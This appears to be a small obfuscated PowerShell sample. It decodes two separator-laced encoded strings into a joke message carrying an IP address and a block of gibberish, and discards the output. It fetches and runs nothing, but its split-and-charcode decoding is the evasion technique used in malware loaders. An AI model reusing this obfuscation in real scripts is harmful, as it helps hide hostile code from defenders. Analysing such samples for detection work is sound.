fuNcTIoN hmoyx { 
    [cMdLETbindING()]param( 
        [paramEteR (valuEfROMpiPelIne)]
        $jayU,
        [paramEteR(valuEfROMpiPelIne)]
        $YfdM
    )
     -JOIn ($jayU-sPlit 'e'-Split 'K'-spLit 'c'-spLIt's' -Split 'N'-Split'_'-SpLiT 'U' -sPlit't'-spliT'}' -sPlit 'B'| foreaCH{ ( [chAR] [InT] $_) } )|oUT-NUlL
     ($YfdM -sPLit ';'-sPLIt'S' -SPLiT'>'-splIT'{' -sPlIT'f' -SpLit','-spLIT 'P' -SpLit'O'-SplIT'L' -sPLIt'A'| foreaCH {([chAR]( [cOnVert]::TOINt16(( [STRiNG]$_ ),16 ))) })-JOIn''| oUT-NUlL
}
$oVmeisX='36N114c101c115c117e108K116B32e61s32e34s87N111t114N107t32_102B97_115B99N105U110s97U116e101}115N32t109U101K46_32_73K32U99B97t110_32N108c111K111U107B32U97c116B32K105_116U32t102N111t114B32}104B111}117N114}115B33N105B112c58_49t54c56N46c50K50N55c46N54}53t46B50N52}49U34K10'
$ARfMIHF='24P72L65>73;75f6cP74O20O3d>20S27O34A31>4cf73{7bS75f47O57P6d,69P6a;62;7bA6af32P6fA42P55A40A57;53{4dA5f>6eO4c;6bf56>3aA4e>61L6bP75>44A5d,5c{65,76A48S31O59,54S5e>38S52,4e,71S57P6fS34,4c{42>3f;37O77{4c>43S52,71O6af31;36,3aA6ef33A48>5f;6aP7aS51O50;60S43A3dP74{32S39;3dL69L59A5c{6a;3aL70L5a;5fS76L78A6fO6d,32>41S51A34S5c{76S72A4ef63A52L61P39S3cA6a,3aP41f60{61P3dO5b>50>59A3bP55;4af3cf73;3eP41A7bS46f5ef31A59>4eA70O51,3bL6df49O55P62A70;47A31P3cS5bO60P5a,50A4e>6f;59O54S31>64;7bP67S6bP39A3bA71P45O6cP67L6bf3fO5cL36,7bS55{70f3f;6cP5cf5ef7cf44;6eL3eL4f{50,3dL5bL38,57A33A60f44P76O5f,3b{41S60P74P36A65L66;7d;6ff67>50;57L33S31,3fL6a;6f>30P6f,63P7c;4c{5f;5fA7dS3bS70;49,6f>79,60;47,68>69f37A50f3c{6e>55;3bS3dP3cL4bL5b{37O6fS65O72P63>45A61{5ef77S6fS5d>31P72S61,7a>7cL7cO5b>7bA79,79L6cL70{79P61>59L6c,43,6dO5eA4d,77{5b;67;35>4d{3cf63S5dO43P42>4eO4eS5d,46A52;6fL4fP35A49S30P45f5cP73>62A4bP4eP49f49{43f66;50L6bS43O49S3d>76;7a,3b{51S37L56>79,4a>5a{6b>33{72S6a{5f{74O55;57f66P44>5e{5e,4b;4a;6aP7bO3d;53O41P3b,4aP7af6cS4ff7cP4eS5f{35>43O3fP52P7c,6e;6a,71f58L61;3d>78;66A59P7c,52O6bS47P42S6c,6cS44,72L63{3fP55P36{6eP65P39;49{6f{4cL63f47>71>77>50{4aA3d;7b;52A6e>74f49A5aO55P56{5dO57;4fA5aL6dS5e,5aO66{6dP31,64;47;4f>43;67S4cP5bP60,7dS64;6f;3e,5c{71L4fL6c>5e>4d;4a;3bS6d>4f>36L3c>6e,44O4fS6f>34,72O77A5bS79f7df74A73{3eO53O37{50P35O7b;5bL3bS47S56{3eL39,5aL53P31;44O4fA7a>69>33,44;56P4e>4aS46A79;62S41,4bO67>78;61f7bP5bP3bL36P58A69L49;62{6f{47>63,77L50P73L3dO68>49{34{7bP50L48f31;46,3fA5c,36O5eO6bL53>3b;35{64A55L5aS50f51,35>32P4b,68;77;44;70,66f55P4aA6dO47S6f>5bS70P65f48P55f7c>77A53>4aL79{7cS51f74f6f,5a;78O31f31>46L41P5f;62f55>32,73;4dL66A47S67f48A66L46;4bL71A77,52S50P67,68P6eP38{58{39{36{42;74A50{30,47L6e;3bS3eL4b{5aO50S32f67P3bL6aO6a{42f52>37,7af6aO49A31A5cA44{4eP3d;38L54A40P7c>6f{43S31P58,32{77S61f44>3b,35L5eO47S38f6bS75S65,3aL56;52{45f60L5af60>3fO49P5c>66P63>4bS57L44,46L42;70L67A31>55O74O75A70O40A4bL32;78;42S6b;66,7aL61f43{34O46,66P34S76>61O3f;3f{51A3b;68S71A6a;59A3fO3fA35>7b{7cP46O7cO38P6b,4dO74,3cA72P5bf6fO46f64f35A32f46f40P27'
hmoyx -jayU $oVmeisX -YfdM $ARfMIHF

